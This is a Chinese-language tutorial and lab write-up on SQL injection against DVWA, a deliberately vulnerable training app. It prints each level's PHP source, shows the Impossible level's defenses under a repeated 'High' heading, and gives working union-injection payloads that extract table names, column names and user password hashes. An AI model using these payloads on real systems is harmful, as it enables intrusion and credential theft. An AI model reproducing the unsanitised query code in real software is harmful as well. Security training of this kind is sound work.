目录
1.概念
SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
1.1 手工注入常规思路
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定回显位置
4.获取当前数据库
5.获取数据库
1.2常见注入类型
最基础的注入-union注入攻击
Boolean注入攻击-布尔盲注
报错注入攻击
时间注入攻击-时间盲注(加速:dns注入,dnslog,二分法,二进制延时注入)
堆叠查询注入攻击
二次注入攻击
宽字节注入攻击
base64注入攻击
cookie注入攻击-http请求头参数注入
XFF注入攻击-http请求头参数注入
知道绝对路径的注入
1.3 相关的基础知识点
mysql默认有一个“information_schema”的数据库:
1.schemata表存储该用户的所有数据库的库名,我们需要记住该表记录数据库名的字段名为 SCHEMA_NAME.
2.TABLES表存储该用户创建的所有数据库的库名和表名。我么需要记住TABLE_SCHEMA和TABLE_NAME
3.COLUMNS表存储该用户创建的所有数据库的库名、表名、和字段名。分别为TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME
2.实验
2.1.LOW
先看源码
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
可以看到
// Get input
$id = $_REQUEST[ 'id' ];
中没有对参数做任何的过滤,直接带入数据库查询,所以这里有着非常明显的sql注入问题
漏洞利用
1.猜测注入类型
从代码中我们可以知道这里存在字符型注入,但是一般我们都是通过黑盒测试的方法,先输入' ,1 and 1=1,1 and 1=2 来判断数字型,通过1' or '1' = '1,1' and '1' = '2判断字符型
通过测试我们发现这是字符型注入
SELECT first_name, last_name FROM users WHERE user_id = '1'
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1' = '1'
2.猜解SQL查询语句中的字段数
使用联合注入
1' union select null#
1' union select null,null#
1' union select null,null,null#
从上面的测试结果可以知道,sql查询的表的字段数为2,并且有2个回显
3.获取当前数据库
1' union select version(),database()#,查询成功,说明当前的数据库为dvwa,版本为:10.5.8-MariaDB-3
4.获取数据库中的表
1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
5.获取表中的字段名
1' union select 1,column_name from information_schema.columns where table_name='users'#
6.获取字段中的数据
1' union select user,password from users #
2.2 Medium
看源码
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?> 1.加入了:mysqli_real_escape_string()函数进行特殊字符转义
2.$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;",从中可以看到是直接取数字,可能存在数字型sql注入
3.mysqli_fetch_row() 函数从结果集中取得一行,并作为枚举数组返回
4.mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组
5.在前端页面做了限制,限制我们输入,且地址栏没有详细id
漏洞利用
通过burpsuite抓包,可以发现 依然可以看到id=1
发送到重发器,构造sql,加入' ,提示语法错误
1 and 1=1 ,页面正常输出
1 and 1=2 ,无输出,所以是数字型注入
接着就可以配合union搞了,和low级别差不多,不再详述。
2.3 High
看代码
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?> 可以发现高级与LOw相比,只是在sql查询语句中,加了limit 1,所以,我们只需要通过burpsuite抓包,通过#注释掉就和LOW级别一样获得数据,如上图所示。
2.4 High
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
// Make sure only 1 result is returned
if( $data->rowCount() == 1 ) {
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?> 可以看到impossible级别加入了 token 值防御csrf,以及PDO防护sql注入。暂时没有sql注入漏洞。